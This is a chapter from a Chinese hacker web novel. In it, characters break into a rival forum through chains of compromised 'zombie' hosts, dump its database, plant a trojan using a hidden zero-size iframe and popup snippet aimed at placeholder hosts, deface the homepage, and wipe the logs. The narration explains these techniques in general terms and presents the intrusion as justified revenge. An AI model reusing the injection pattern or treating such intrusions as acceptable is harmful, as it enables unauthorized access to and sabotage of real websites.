第28章 开始入侵【求推荐】

  刘毅瞪大了眼睛一脸夸张的看着前边儿桌前站起身向这边儿看过来的沙漏，眼前见到他所表现的的神态根本就不是什么程序猿，而是一个大混混头子。

  “你过来！”三哥看着沙漏，摆了摆手，示意他过来。

  沙漏推开椅子，因为没了眼镜，支着双胳膊，像摸瞎子一样向这边儿走来，沙漏一旁坐着的无双，露出虎牙，小声笑了笑，捡起地上的眼镜，拍了拍沙漏的肩膀。

  “谁！”

  “我，无双！”

  “哦”

  无双帮忙将眼镜给沙漏带了上去，刘毅，第一次见到了他的正脸，只见其脸色有些苍白，身材瘦弱，头发如干草，穿的有些邋遢。

  带上眼镜的沙漏，看着一旁的无双，脸色有些发红，为了掩饰，迅速来到三哥和刘毅这边儿。

  “这位是？”

  沙漏看着刘毅，因为刚刚分析病毒太专注，不知道刘毅的到来，看向一旁的三哥。

  “你还真有意思！”三哥笑了笑，介绍道：“这是咱们公司新人名叫刘毅，紫涵带来的，我说，你这毛病真该改改，人家来了那么长时间了，你打个招呼都不打，不好吧？”

  沙漏有些不好意思的挠了挠头，只见从头发中飘出一片白色头屑，尴尬的笑了笑，“刘毅不好意思啊，我就这毛病，工作起来什么都不知道了。”

  刘毅一笑，伸出手，“没事儿，我不注重这个，咱们以后都是同事，这点儿小事儿算不上什么！”沙漏见刘毅伸出了手，手在衣服上抹了两下，伸手两人握了一下手，尴尬的感觉瞬间消失，之后，三哥将事情的经过都和沙漏说了起来，听后沙漏眉头紧皱，“三哥，干活吧！”

  干活？刘毅大量了一下二人，只见沙漏转身回到了自己的座位上，三哥笑了笑拍了拍刘毅的肩膀，“你可以看着，也可以跟我们一起！”说着腿一用力，回到了自己的坐位上。

  “三哥！五分钟渗透，之后你挂马，小心点儿，别忘了用跳板，他们自由人好像有蜜罐。”

  沙漏所说的渗透又可以称之为踩点儿，通过扫描网站主机的安全信息，找到管理员的各项信息，服务器信息，邮件服务器，发动木马入侵，寻找网站漏洞，SQL注入攻击，入侵数据库等一些入侵方式的前提。

  肉鸡跳板，说起这个就不得不说肉鸡这个暗语，肉鸡就是通过木马病毒被黑客远程控制的计算机，黑客可以通过留有的后门拥有计算机的最高权限，轻松控制中了病毒的计算机，肉鸡跳板，也就是通过肉鸡与肉鸡间确定一种网络关系，黑客用本机登录一台肉鸡，通过当前的肉鸡，再一次登录其他的肉鸡，以此类推，经过多次跳板，从而隐藏自己的身份，毕竟一个黑客，隐藏自己的信息身份是最为主要，最安全的。

  蜜罐，这其实是服务器的一种陷阱式的防御策略，管理员故意将服务器变得千疮百孔，想要让黑客误以为这台服务器是个软柿子，引诱黑客上门，然后通过服务器中强大的信息记录功能，将黑客攻击的方式，痕迹，IP全部掌握，管理员可以通过这些数据，这些证据上交网监部门起诉入侵者。

  三哥笑着点了点头，“你放心吧，没事儿！别忘了我是干什么的，我就肉鸡多！”看着两人的对话，刘毅知道，他们俩是想要帮自己入侵他们的网站，于是拖着椅子，向三哥身边凑了过去，想要看看，他们的入侵方式跟自己有什么不同。

  只见三哥点开虚拟机，点开代理ip更改了自己的IP地址，打开浏览器，输入IP，浏览器搜索界面出现本机的IP信息，美利坚，三哥见ip代理成功，拉出一个名叫肉鸡的自制程序，双击程序运行，从中出现一个只见一个下拉框式的界面，紧接着出现一个提示框和一个编辑框，提示框显示信息“请输入密码！”三哥键入密码，密码输入后，下拉框中出现上百台小计算机图标，有的亮着屏幕，有的黑着屏幕。

  刘毅看着眼前的一行行图标，他知道这就是这个专注于编写病毒，积攒下来的肉鸡，只见三哥左键长按，选中二十台肉鸡随后右键，点击踏板，随后将入侵后需要的木马通过远程信息传送，传进最后一台，也就是攻击端肉鸡。

  “三哥，绕过蜜罐，网站补丁打的不错，找不到注入点，只能爆库！”

  听到了沙漏的喊声，刘毅看了看电脑上的时间，刚刚好五分钟！太强了，五分钟绕过蜜罐系统，要知道，蜜罐服务器就如同一颗炸弹一样，一不小心，自己的一个脚印被记录下来，那都是非常危险的，这个被称为渗透之王的人，果然有两把刷子。

  爆库又叫托库，就是将网站内存放昵称，帐号，密码，等等一些网站内的信息，拖拽到本地，实现爆库，从而获取管理员用户密码，实行挂马操作。

  这一次因为服务器中存放的信息太多，大约半个多小时的时间，沙漏说道：“密码adminziyouren”随后三哥切入到肉机攻击端，打卡网页，通过外网进入论坛后台，输入密码，进入网站内部。

  找到数据库，上传本地木马，随后找到首页文件，编辑主页内容，这时，三哥看向一旁的刘毅，站起身，“这块儿就交给你了！”见三哥看向自己，刘毅先是一愣，随后笑了笑，来到三哥的座位上，刘毅将自由人论坛内的主页全部清空，打开将浏览器缩放下去，打开记事本，编辑出这样一段代码。

  <html>

  <iframesrc=“http:\/\/www。xxxx。com\/2。htm“width=“0“height=“0“frameborder=“0“><\/iframe>

  <\/html>

  <SCRIPTlanguage=javascript>

  window。open(“http:\/\/www。xxx。com\/htm“，““，“toolbar=no，location=no，status=no，menubar=no，scrollbars=no，width=1，height=1“);

  <\/script>”

  看到代码，三哥一愣，随后一笑，“你这个马，还不够足，我觉得啊，我那个能更暴力一点儿。”

  刘毅笑了笑，“三哥，做人要给人留一线机会，可别往死里整啊。”

  三哥听后，也没说什么，之后刘毅新建一个txt记事本开始编辑html主页代码底色编辑成黑色字的颜色编辑成红色，“亲爱的自由人论坛管理员，对于入侵贵站，实属无奈，今日凌晨，本想依靠免费共享为准则，发布熊猫烧香病毒专杀工具，没想到被贵站强行占位己有，且将本人自由人帐号封禁，入侵贵站没其他的任何想法，只想将此事广布于众，你若不服，便战！！！”

  刘毅将编辑的内容保存，将之前保存的代码，上传到数据库，将刚刚编辑成功的黑页，挂在了网站的主页目录。

  黑页刚上传到数据库，另一边沙漏喊道：“脚印擦完了，退出去吧！”

  每个网站后台都会有一个记录日志，凡是管理员对网站的操作，日志都会记录，所以每个入侵者操作完成之后，都会擦一下脚印，也就是清空记录日志。

  刘毅听后，点了点头，原来从进入后台之后，沙漏一直都在帮助刘毅查看后台日志，帮忙勘测管理员是否上线，其中还包括，清理脚印，刘毅站起身，“三哥，剩下的你操作吧，你这些工具，我不熟。”

  三哥笑了笑操作肉鸡向后跳，直到回到自己的主机，回到自己的主机，三哥打开自由人论坛，一个刚挂上去的黑页显示在论坛首页。